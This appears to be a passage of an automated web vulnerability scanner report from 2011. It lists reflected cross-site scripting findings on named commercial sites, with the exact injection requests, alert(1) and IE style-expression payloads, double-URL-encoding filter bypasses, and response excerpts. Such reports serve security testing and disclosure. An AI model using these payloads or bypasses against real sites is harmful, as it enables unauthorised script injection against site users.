The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90e81"><script>alert(1)</script>49b2497dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wholesale-Shower-Faucets_c286390e81"><script>alert(1)</script>49b2497dc HTTP/1.1 Host: www.lightinthebox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoco ...[SNIP]... <a href="/wholesale-Shower-Faucets_c286390e81"><script>alert(1)</script>49b2497dc"> ...[SNIP]...
3.122. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lightinthebox.com
Path:
/wholesale-Shower-Faucets_c2863
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c002"><script>alert(1)</script>7f0bb6aab4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wholesale-Shower-Faucets_c2863?8c002"><script>alert(1)</script>7f0bb6aab4f=1 HTTP/1.1 Host: www.lightinthebox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoco ...[SNIP]... <a class="sub-menu-icon" href="/wholesale-Shower-Faucets_c2863?8c002"><script>alert(1)</script>7f0bb6aab4f=1#nogo" rel="nofollow" title=""> ...[SNIP]...
3.123. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lightinthebox.com
Path:
/wholesale-Shower-Faucets_c2863
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82d7d'%3balert(1)//5681bfb5b3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 82d7d';alert(1)//5681bfb5b3e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wholesale-Shower-Faucets_c2863?82d7d'%3balert(1)//5681bfb5b3e=1 HTTP/1.1 Host: www.lightinthebox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8e5e2<a>074b39b533a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /p-aasG6JkxVvmNA8e5e2<a>074b39b533a HTTP/1.1 Host: www.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html Content-Language: en Date: Thu, 03 Feb 2011 22:03:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha ...[SNIP]... <em> p-aasG6JkxVvmNA8e5e2<a>074b39b533a</em> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aabbe"><a>fe7c65bf24b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /p-aasG6JkxVvmNAaabbe"><a>fe7c65bf24b HTTP/1.1 Host: www.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html Content-Language: en Date: Thu, 03 Feb 2011 22:03:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d612%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220eedd2683a3 was submitted in the REST URL parameter 1. This input was echoed as 1d612"style="x:expression(alert(1))"0eedd2683a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /1d612%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220eedd2683a3/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:59 GMT Content-Length: 8711 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/ Set-Cookie: ASP.NET_SessionId=0rroqt55mx5ciq55y2wqysn5; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0935%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522182a262986e was submitted in the REST URL parameter 1. This input was echoed as f0935"style="x:expression(alert(1))"182a262986e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /buyf0935%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522182a262986e/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:55 GMT Content-Length: 8732 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:55 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:55 GMT; path=/ Set-Cookie: ASP.NET_SessionId=u5pklnekx3dx2wzgqqztpun5; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fed4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522152282d3cc2 was submitted in the REST URL parameter 2. This input was echoed as 4fed4"style="x:expression(alert(1))"152282d3cc2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /buy/4fed4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522152282d3cc2 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:30:10 GMT Content-Length: 8711 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/ Set-Cookie: ASP.NET_SessionId=nmr5smvrazti5abqjnbbtv45; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:30:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1baf%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522056ce7adff3 was submitted in the REST URL parameter 2. This input was echoed as c1baf"style="x:expression(alert(1))"056ce7adff3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /buy/x22c1baf%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522056ce7adff3 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:30:05 GMT Content-Length: 8732 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:05 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:05 GMT; path=/ Set-Cookie: ASP.NET_SessionId=dvui0v455qaojrfdct104guc; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:30:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.130. http://www.smartdraw.com/buy/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/buy/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61661"style%3d"x%3aexpression(alert(1))"aa36938865b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61661"style="x:expression(alert(1))"aa36938865b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /buy/x22?61661"style%3d"x%3aexpression(alert(1))"aa36938865b=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/ Set-Cookie: ASP.NET_SessionId=zuev0255yk14t1frw24v3j55; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8753 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.131. http://www.smartdraw.com/buy/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/buy/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b9c"style%3d"x%3aexpression(alert(1))"07d1f7b8086 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47b9c"style="x:expression(alert(1))"07d1f7b8086 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /buy/x22?47b9c"style%3d"x%3aexpression(alert(1))"07d1f7b8086=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: ASP.NET_SessionId=sbcbwyb2aq3qzfu15i0dsh55; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8753 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a862%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8fd8df6ce03 was submitted in the REST URL parameter 1. This input was echoed as 2a862"><script>alert(1)</script>8fd8df6ce03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /2a862%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8fd8df6ce03?id=340839/x22/x3eSmartDraw HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:32 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:32 GMT; path=/ Set-Cookie: ASP.NET_SessionId=dc5mez55nymwryfaavsylt55; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8844 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96d2c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e26549339e2c was submitted in the REST URL parameter 1. This input was echoed as 96d2c"><script>alert(1)</script>26549339e2c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /downloads96d2c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e26549339e2c?id=340839/x22/x3eSmartDraw HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:29 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:29 GMT; path=/ Set-Cookie: ASP.NET_SessionId=q4uupajw15d2f4bqiizdyum2; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8907 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fd6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252271fe023e54 was submitted in the REST URL parameter 1. This input was echoed as 6fd6e"style="x:expression(alert(1))"71fe023e54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /downloads6fd6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252271fe023e54 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:27 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:27 GMT; path=/ Set-Cookie: ASP.NET_SessionId=yyv5x0450piuis45ejmzuryy; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8739 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75a12%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228ae5fca1f39 was submitted in the REST URL parameter 1. This input was echoed as 75a12"style="x:expression(alert(1))"8ae5fca1f39 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /75a12%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228ae5fca1f39 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:31 GMT Content-Length: 8683 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/ Set-Cookie: ASP.NET_SessionId=jl33dq55fge2ij55usujg355; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1f7d"><script>alert(1)</script>1bd1fdf7711 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /downloads?id=340839/x22/x3eSmartDrawa1f7d"><script>alert(1)</script>1bd1fdf7711 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5facb"><script>alert(1)</script>49b68308620 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /downloads?id=5facb"><script>alert(1)</script>49b68308620 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.138. http://www.smartdraw.com/downloads [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/downloads
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8433d"><script>alert(1)</script>f5beed3ebcb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /downloads?8433d"><script>alert(1)</script>f5beed3ebcb=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.139. http://www.smartdraw.com/downloads [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/downloads
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aec6"><script>alert(1)</script>133a985f46b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /downloads?9aec6"><script>alert(1)</script>133a985f46b=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2601%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522cc75ed19a87 was submitted in the REST URL parameter 1. This input was echoed as b2601"style="x:expression(alert(1))"cc75ed19a87 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /downloadsb2601%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522cc75ed19a87/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: ASP.NET_SessionId=gjwvvma5ouzgwz45mccvo0yz; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8774 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
